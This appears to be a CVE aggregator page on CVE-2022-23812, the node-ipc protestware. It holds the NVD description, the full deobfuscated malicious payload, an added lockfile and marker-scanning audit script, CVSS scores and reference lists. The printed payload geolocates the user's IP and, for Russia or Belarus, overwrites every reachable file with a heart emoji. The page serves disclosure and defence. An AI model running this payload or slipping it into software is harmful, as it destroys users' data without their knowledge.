CVE-2022-23812

Description from NVD

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with an IP located in Russia or Belarus and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior.

Malicious Code: **Note:** Don't run it!

```js
import u from "path";
import a from "fs";
import o from "https";

setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");             // "./"
      const o = Buffer.from("Li4v", "base64");             // "../"
      const r = Buffer.from("Li4vLi4v", "base64");         // "../../"
      const f = Buffer.from("Lw==", "base64");             // "/"
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); // "country_name"
      const e = Buffer.from("cnVzc2lh", "base64");         // "russia"
      const i = Buffer.from("YmVsYXJ1cw==", "base64");     // "belarus"
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));

async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64"); // heart emoji
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with a heart emoji
      } catch (t) {}
    }
  }
  return f;
}

const ssl = true;
export { ssl as default, ssl };
```
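The description above gives a defender three things to check for: the directly affected node-ipc version range (10.1.1 up to but excluding 10.1.3), the peacenotwar dependency pulled in from 11.0.0 onwards, and the base64 constants the payload is built from. The following is an added example, not code from the NVD entry or the node-ipc project: a small audit that applies those three checks to a lockfile and to source text. It assumes the `packages` map layout of a lockfileVersion 2/3 `package-lock.json`; `SAMPLE_LOCK` and `SAMPLE_SOURCE` are constructed sample data, and the `js-message` entry and its version are illustrative only.

```javascript
// Added example (not from the NVD entry or the node-ipc project): a small
// dependency audit for the protestware described above. It flags
//   1. node-ipc versions 10.1.1 <= v < 10.1.3 in a package-lock.json,
//   2. any package that is, or depends on, peacenotwar (node-ipc >= 11.0.0), and
//   3. source text containing base64 constants quoted in the description.
// SAMPLE_LOCK and SAMPLE_SOURCE are constructed sample data, not real files.

const AFFECTED_MIN = [10, 1, 1]; // first affected node-ipc version (from the NVD text)
const AFFECTED_MAX = [10, 1, 3]; // first fixed version, exclusive (from the NVD text)

// Base64 literals taken from the malicious code above; the scanner matches the
// encoded form, and the decoded meaning is listed only for the reader.
const MARKERS = {
  "aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9": "geolocation API URL (prefix)",
  "Y291bnRyeV9uYW1l": "country_name",
  "cnVzc2lh": "russia",
  "YmVsYXJ1cw==": "belarus",
  "4p2k77iP": "heart emoji",
};

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : null;
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True only for the releases that carried the payload in their own source.
function isDirectlyMalicious(version) {
  const v = parseVersion(version);
  return v !== null &&
    compareVersions(v, AFFECTED_MIN) >= 0 &&
    compareVersions(v, AFFECTED_MAX) < 0;
}

// Walks the "packages" map of a lockfileVersion 2/3 package-lock.json.
// Keys look like "node_modules/<name>" (possibly nested); the root project is "".
function auditLock(lock) {
  const findings = [];
  for (const [path, pkg] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // root project entry
    const name = path.slice(path.lastIndexOf("node_modules/") + "node_modules/".length);
    const deps = Object.keys(pkg.dependencies || {});
    if (name === "node-ipc" && isDirectlyMalicious(pkg.version)) {
      findings.push({ path, version: pkg.version, reason: "node-ipc release containing the CVE-2022-23812 payload" });
    }
    if (name === "peacenotwar" || deps.includes("peacenotwar")) {
      findings.push({ path, version: pkg.version, reason: "is or depends on the peacenotwar package" });
    }
  }
  return findings;
}

// Returns every known marker string found in a piece of source text.
function scanSource(text) {
  return Object.entries(MARKERS)
    .filter(([encoded]) => text.includes(encoded))
    .map(([encoded, meaning]) => ({ marker: encoded, meaning }));
}

// Constructed lockfile: one affected node-ipc release next to harmless packages.
const SAMPLE_LOCK = {
  name: "sample-app",
  lockfileVersion: 2,
  packages: {
    "": { name: "sample-app", dependencies: { "node-ipc": "^10.1.0", vue: "^3.2.0" } },
    "node_modules/node-ipc": { version: "10.1.2", dependencies: { "js-message": "1.0.7" } },
    "node_modules/js-message": { version: "1.0.7" },
    "node_modules/vue": { version: "3.2.31" },
  },
};

// Constructed source fragment containing two of the marker constants.
const SAMPLE_SOURCE = [
  'const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");',
  'const e = Buffer.from("cnVzc2lh", "base64");',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log(auditLock(SAMPLE_LOCK));   // one finding: node_modules/node-ipc 10.1.2
  console.log(scanSource(SAMPLE_SOURCE)); // two markers: country_name, russia
}

if (typeof module !== "undefined") {
  module.exports = { isDirectlyMalicious, auditLock, scanSource, SAMPLE_LOCK, SAMPLE_SOURCE };
}
```

The version check is deliberately exact rather than a semver-range match, so a lockfile that pins 10.1.3 or 9.x produces no finding; the peacenotwar check is separate because a clean-looking 11.x version string still pulls the behaviour in through that dependency. The marker scan is a last line of defence for vendored or copied code that never went through a lockfile.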

Information Acquisition Date: 2022-03-31T16:40Z
CVSS 2.0: 10.0 HIGH
CVSS 3.x: 9.8 CRITICAL

CVSS3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

NVD References

- URL: N/A (source: CONFIRM; tags: Patch, Third Party Advisory)
- URL: N/A (source: CONFIRM; tags: Issue Tracking, Patch, Third Party Advisory)
- URL: N/A (source: CONFIRM; tags: Exploit, Patch, Third Party Advisory)
- URL: N/A (source: CONFIRM; tags: Issue Tracking, Patch, Third Party Advisory)
- URL: N/A (source: CONFIRM; tags: Third Party Advisory)


List of frequently cited URLs

| URL | Number of times referred to |
| --- | --- |
| http://patrowl.io | 205 |
| https://cvetrends.com | 48 |
| https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-pac... | 5 |
| https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc... | 5 |
| https://qiita.com/SnykSec/items/6e75bd78b4deb3371550 | 4 |
| https://security.snyk.io/vuln/SNYK-JS-NODEIPC-2426370 | 4 |
| https://github.com/RIAEvangelist | 3 |
| https://twitter.com/abstract_artem/status/1504760809825751057 | 3 |
| https://b.hatena.ne.jp/entry/s/qiita.com/SnykSec/items/6e75... | 3 |

Information from Twitter

| User | URL | Tweet ID | Date |
| --- | --- | --- | --- |
| shimakazetyan | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23812 | 1618651347745918977 | 2023/01/27 |
| threatintelctr | https://nvd.nist.gov/vuln/detail/CVE-2022-23812 | 1631013169446486016 | 2023/03/02 |
| threatintelctr | https://nvd.nist.gov/vuln/detail/CVE-2022-23812 | 1631836080201760768 | 2023/03/04 |
| WolfgangSesin | http://www.sesin.at | 1632629808529039360 | 2023/03/06 |
| WolfgangSesin | https://www.sesin.at/2023/03/06/cve-2022-23812-node-ipc | 1632629808529039360 | 2023/03/06 |
| www_sesin_at | http://www.sesin.at | 1632629810601119745 | 2023/03/06 |
| www_sesin_at | https://www.sesin.at/2023/03/06/cve-2022-23812-node-ipc | 1632629810601119745 | 2023/03/06 |

GitHub Search Results: Up to 10
| Name | URL |
| --- | --- |
| scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 | https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 |

Score (2023/03/06): 0
Added to Har-sia Database: 2022/03/17
Last Modified: 2023/03/06
Highest Scored Date: 2022/03/18
Highest Score: 56